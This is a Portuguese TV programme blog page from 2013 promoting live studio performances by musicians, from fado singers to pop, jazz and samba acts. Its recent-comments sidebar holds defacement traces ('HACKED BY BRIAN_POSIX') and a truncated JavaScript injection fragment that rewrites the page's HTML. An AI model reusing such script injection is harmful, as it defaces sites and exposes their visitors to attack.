Ao Vivo - Mais Mulher @ 18:30

Qua, 20/03/13

Orlando Santos é um músico e compositor português, e uma das melhores vozes masculinas nacionais.

Admirador da cultura jamaicana, Orlando Santos mergulha em territórios próximos do reggae, rock e música soul. É um dos raros músicos em Portugal a tocar de forma exímia a "slide guitar", instrumento que lhe foi oferecido por Ben Harper após um concerto em Lisboa.

Após muitos anos de música e composição, tocando em bares e festivais, prepara-se para editar o seu primeiro álbum "My Soul", onde a um extraordinário lote de canções originais se junta uma versão de uma canção dos Melodians, de 1972, "Rivers of Babylon", em que Orlando mostra o seu invulgar talento de intérprete. Neste álbum existe ainda uma canção (Only Love) em dueto com Petaah Morgan, cantor emergente da Jamaica, numa partitura tocada por músicos jamaicanos.

Orlando Santos não é um debutante em disco, pois a sua experiência e talento aparecem em colaborações no disco "Revistados" dos GNR, onde dá voz ao tema "6ª feira" com Charlie Martinez nos teclados (http://youtu.be/V9s1898RfzI). Colaborou ainda com os Cool Hipnoise, Kika Santos, Orelha Negra (http://youtu.be/nFS4GonXg64) ou os britânicos Up Bustle & Out e com o baixista Jim Barr (Portishead).

As suas composições são marcadas por palavras de esperança e amor por todos os seres, onde se destacam a preocupação pela Natureza ou a observação das transformações sociais.


No Mais Mulher desta quinta-feira, Orlando Santos apresenta o seu novo álbum, “My Soul”, o álbum de estreia que chega às lojas a 25 de Março. O single de avanço é o tema “For Real (electric mood)” e já se contra disponível digitalmente (aqui).

 

Por isso não perca, às 17:30 desta quinta-feira na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 






Ao Vivo - Mais Mulher @ 18:30

Sab, 09/03/13

Marco Rodrigues está de volta aos álbuns: “EntreTanto” chega às lojas no próximo dia 4 de Março, com o selo da Universal Portugal. Disco de muitas vontades, “EntreTanto” vai marcar, de forma indelével e inesquecível, um percurso que há muito se tornou ímpar.

Em “EntreTanto”, Marco Rodrigues expõe, com intensidade e paixão, a demanda pela profundidade da sua identidade artística e a sua constante busca pelas várias ramificações do fado. “Coração Olha O Que Queres” é a primeira amostra retirada do novo álbum: partindo de uma composição clássica de outro estudioso, Custódio Castelo, Marco Rodrigues traz para este exercício entre o fado e o Minho um texto com mais de 500 anos (de Francisco Rodrigues Lobo), pejado de verdades absolutamente dúbias sobre o universo feminino.

 

A não perder no Mais Mulher desta segunda-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Ao Vivo - Mais Mulher @ 18:30

Ter, 26/02/13

“The Curimakers” são um coletivo pop/funk/soul Português de 8 elementos.
Têm uma compilação denominada “Split in Two” disponível no iTunes e outros sites de vendas da internet. O CD foi lançado em 2011.

Reconhecendo o trabalho e o valor dos “The Curimakers”, a vocalista dos “GIFT”, Sónia Tavares,
apadrinhou esta banda no concurso Rock Rendez Worten em 2011.

“The Curimakers” foram finalistas do RRW, sendo na fase plugged, a banda mais votada pelo público em todas as categorias a concurso, e vencendo o prémio de melhor refrão. http://www.rrw.pt/curimakers

Os “The Curimakers* lançaram o seu videoclip de estreia “Split in Two” em 2011.
http://www.youtube.com/watch?v=6QEbAv7VGNU. O início de 2013 marca o lançamento do seu
segundo videoclip http://www.youtube.com/watch?v=pGCnIS-ZYy0, desta vez para a música
“Mister Soul”.

Como projeto de responsabilidade social, os “The Curimakers” celebraram também um protocolo com
a ACAPO para cedência de direitos de venda na internet do tema “Blind Eyes Open”, bem como da
cedência de parte das receitas da venda física do disco.

Este protocolo foi amplamente difundido em diversas FNACs.
Na sua 1ª apresentação na FNAC Colombo e na FNAC Coimbra, o disco foi o mais vendido do dia.

 

A Banda foi selecionada recentemente pela MusicVerb para fazer parte do seu portfólio de artistas
na vertente Funk/Soul. http://www.musicverb.com/category/funksoul/ e está agora também
inscrita na central de artistas.

 

Por isso já sabe, não perca esta actuação ao vivo inesquecível! No Mais Mulher desta quarta-feira às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 






Ao Vivo - Mais Mulher @ 18:30

Sex, 22/02/13

Muito se podia escrever sobre Shina.

Mas o que importa referir é que, esta cantora representa uma geração de filhos de emigrantes que, apesar de terem nascido longe, sentem que a sua alma é portuguesa.
Em Shina tudo é Fado: voz, expressão, emoção.

“Sinto-me Fado”, o seu disco de estreia, é o resultado final de anos de trabalho da cantora com Filipe de Sousa.

Uma reunião de fados tradicionais como “Loucura” e “Xaile da minha mãe”, mas também de experiências como “Um velhinho caminhava” misturando o tradicional da música com a letra de uma canção que Shina canta desde pequena.

Tendo a sua família raízes em Cinfães, Shina quis homenageá-la, readaptando o “Malhão de São Simão” e o “Malhão de Cinfães”.

A cantora não pôde também esquecer o país onde nasceu e, por isso, incluiu também temas tradicionais da música francesa como “Ne me quite pas” e “L’important c’est la rose”.
Escutando este trabalho e vendo-a a cantar ao vivo, confirma-se que se está diante de uma verdadeira fadista.

Voz, ritmo, postura, emoção… todos os ingredientes estão presentes.

Shina já teve o privilégio de cantar em vários países como França, Alemanha, Suíça, entre outros. Chegou a altura de revelar aos portugueses esta cantora que tem Portugal no coração e a alma fadista na voz.

 

Não perca no Mais Mulher desta segunda-feira às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 

 






Ao Vivo - Mais Mulher @ 18:30

Qua, 20/02/13

O jazz tem uma nova voz. Se é verdade que Elisa Rodrigues tem vindo a deslumbrar em palco há já algum tempo, o lançamento do seu primeiro disco “Heart Mouth Dialogues” é a confirmação disso. Elisa é capaz de tornar grandes clássicos em temas seus e de reinventar músicas com uma versatilidade impressionante.


As suas influências são muito variadas, já que ouve géneros musicais diferentes, desde Amália Rodrigues, Billie Holiday, Ella Fitzgerald, Chet Baker, Elis Regina, passando por Lasha de Sela, Ravi Shankar, Willie Nelson ou Joni Mitchel.


Em 2011 lança assim “Heart Mouth Dialogues”, JACC Records um disco que muda de um registo mais clássico do jazz em temas como Cry me a river ou You don’t know, para momentos mais modernos como Dumb ou Roxane e até para registos que surpreendem. Basta ouvir Sonhos para experimentar toda a emoção e força da voz de Elisa Rodrigues. Trata-se de um disco com sabor a jazz ainda que com um alcance maior, a ouvir com atenção e para saborear com cuidado.

 

Por isso não perca esta atuação ao vivo imperdível, no Mais Mulher desta quinta-feira às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 




Ao Vivo - Mais Mulher @ 18:30

Sex, 15/02/13

Os Dazkarieh estão de volta com “Eterno Retorno”, o seu sexto trabalho de estúdio. Com músicas de Vasco Ribeiro Casais e letras de Joana Negrão, os Dazkarieh assinam um disco que reflecte sobre a realidade como ciclos que se repetem e alternam, numa certa reminiscência do conceito de Nietzsche. A busca interior, a vida, o amor e a passagem do tempo são temas recorrentes dos Dazkarieh que também marcam presença neste disco.
 
“Eterno Retorno” começa a ser reconhecido internacionalmente. Entrou para o top 20 da Worldmusic Charts Europe o ano passado e à semelhança do álbum anterior, foi também editado na Alemanha, onde a banda já fez uma tour.
 
Com uma sonoridade única os Dazkarieh são rock alternativo e são folk experimental porque combinam instrumentos mais comuns, instrumentos tradicionais portugueses e instrumentos exclusivos. E porque os eletrificam mas também os mostram no seu estado mais puro, fazendo acontecer a sua música original com versões de temas tradicionais portugueses. Quando sobem ao palco provam que tudo isto, o passado e o presente, podem coexistir num mesmo momento.

 

Uma atuação ao vivo imperdível no Mais Mulher desta segunda-feira, às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 

 






Ao Vivo - Mais Mulher @ 18:30

Qua, 13/02/13

Cantora talentosa e de forte personalidade, Luiza é filha da famosa Zizi Possi tendo já lançado vários CD’s, o último dos quais autoral e dedicado a canções inéditas. “Bons Ventos Sempre Chegam” tem sotaque de pop e MPB.

 

De 16 de novembro de 2012 a 10 de junho de 2013, o Espaço Brasil é o centro cultural dedicado das artes brasileiras contemporâneas.


Concertos, exposições, palestras, workshops, gastronomia são algumas das manifestações que este espaço vai oferecer ao público de Portugal uma programação repleta de iniciativas que representam o que de mais atual e inovador se faz no âmbito das artes e da cultura do Brasil.
Além da música, cuja programação está a cargo de Zé Ricardo, o Espaço Brasil oferece exposições, palestras, workshops, eventos, audiovisuais, gastronomia e outras atividades, pelo menos, até 10 de junho.


Aberto ao público de 5ª feira a domingo, há dois períodos de acesso: entre as 14h e as 20H (gratuito) e a partir das 21H, em que a entrada é paga para se poder assistir aos espetáculos. Aos domingos o horário é adaptado para os concertos que começam às 18H.


Os bilhetes estão disponíveis online, através da Ticketline, nos locais habituais e na bilheteira do próprio Espaço Brasil.
 Com a cenografia a cargo de Aby Cohen e decoração do jovem artista plástico brasileiro Derlon, o Espaço Brasil tem uma área total de 1.200 m2 constituída por sala de espetáculos, galeria, bares, terraço e até um cineclube que será inaugurado mais tarde.


Trata-se de um espaço desenvolvido no âmbito do Ano do Brasil em Portugal, uma iniciativa do Ministério da Cultura do Brasil, implementada através da Funarte, e que tem como comissário geral António Grassi.

 

Por isso não perca este evento único e ao vivo inesquecivel no Mais Mulher desta quinta-feira, às 17:30, na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 






Ao Vivo - Mais Mulher @ 18:34

Seg, 11/02/13

Os Democratas do Samba têm o samba de raíz, a começar pela sua formação acústica, a sua principal característica. Cavaquinho, violão, vozes, percussões e sopros, numa roda de samba tipicamente carioca.


Apadrinhado por Sombrinha, criador do Grupo Fundo de Quintal, e liderado por Tércio Borges, um dos fundadores do movimento de samba da Lapa carioca, Os Democratas do Samba não só resgatam os grandes temas, como apresentam originais e músicas contemporâneas, num clima bem brasileiro, de um jeito bem carioca.


Tércio Borges, filho do violonista, cantor e compositor Tércio Guimarães, é carioca da gema, e começou a aprender música sozinho, tocando violão e cavaquinho aos 16 anos de idade nas rodas de samba do Rio, hábito que lhe rendeu respeito e aprovação dos bambas da música. Entre trabalho a solo e trabalho de grupo, Tércio Borges já possui 5 CDs gravados, e está agora a caminho do sexto CD, que inclusive terá participações especiais, entre elas a do sambista Diogo Nogueira, que já se apresentou ao lado do grupo aqui em Portugal no Teatro do Bairro.


Tércio Borges e os Democratas do Samba também já se apresentaram ao lado de grandes nomes como “Sombrinha”, do Fundo de Quintal, o sambista Diogo Nogueira, as cantoras Silvia Nazário, Edna Pimenta e Letícia Gabian da Bahia, a carioca Pat Escobar, o cantor Neon Rodrigues, o português Nuno Bastos, entre outros.

 

Não perca, no Mais Mulher desta terça-feira, duas atuações ao vivo imperdíveis!

 

Às 17:30, na SIC Mulher!

 

Mas se não viu. Veja os vídeos aqui!

 

 




Ao Vivo - Mais Mulher @ 18:30

Qua, 30/01/13

Ana Free entra em 2013 com a sua estreia em álbum.

“TO.GET.HER” chega às lojas no dia 28 de Janeiro e é o culminar de um longo percurso de maturação daquela que é um dos maiores fenómenos da nova música “made in Portugal”.
 
Produzido pelo argentino Rodrigo Crespo, que trabalhou com nomes como Shakira, The Glammers e em vários discos premiados, “TO.GET.HER” foi gravado entre Buenos Aires, Londres e Lisboa, entre Janeiro e Junho de 2012.

“TO.GET.HER” é uma coleção de grandes canções Pop, com uma forte influência do mais moderno R'n'B e dos mais contagiantes ritmos latinos, que mostra, de uma forma inquestionável, o crescimento artístico de Ana Free, que assina todas as letras e músicas (em parceria com Rodrigo Crespo).

Um disco onde se fala de amor, nostalgia e esperança, onde se evocam histórias de vida que nos tocam e onde certamente nos iremos rever, porque é assim que a Pop deve ser e Ana Free fá-lo como poucos, entre nós.

 

E marca presença no Mais Mulher desta quinta-feira, às 17:30, na SIC Mulher para um concerto ao vivo imperdível!

 

Não perca...

 

E se não viu. Veja o vídeo aqui!

 

 




Ao Vivo - Mais Mulher @ 18:30

Seg, 28/01/13

Tragam os tapetes vermelhos e lancem os "confetti" disponíveis à mão, pois vai dar entrada em cena a nova Coqueluche Pop Portuguesa. Não se poupem, no entanto, aos aplausos, pois daqui só promete coisa boa.

"O Martim" nasce como confessionário-pop de Martim Torres, um jovem (contra) baixista com cartas dadas em paragens como as de B Fachada, Homens da Luta,e diversos projectos de Jazz. Muitos o conhecerão também como uma das metades da infame dupla "Maria Amélia", presença habitual no programa 5 Para a Meia Noite. Munido com um computador portátil, uma caixa de ritmos, vários instrumentos e voz malandra, gravou sozinho metade dos temas de um "Em Banho Maria" ainda em estado embrionário.

 

Não satisfeito com a primazia da batida programada,  decide gravar a outra metade do disco já com um baterista, sendo escolhido o seu então colega David Pires. Assim definido o repertório de estreia, surgem os primeiros concertos e faltava então quem lhe desse vida em palco. O baterista permanece no seu posto, juntando-se-lhe o exímio António Quintino no baixo eléctrico e, mais tarde, a versátil Íris Sarai nos teclados. É então que lentamente "O Martim" se torna numa proposta cada vez mais colectiva,  num processo de osmose em que "O Martim" é só um, mas na verdade são quatro que se aglutinam e fazem alguma coisa acontecer. Já não um "projecto", mas sim uma concretização, uma realidade.

 

Um "Ao Vivo" a não perder, no Mais Mulher desta terça-feira, às 17:30, na SIC Mulher!

 

E se não viu, veja o vídeo aqui!

 





Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO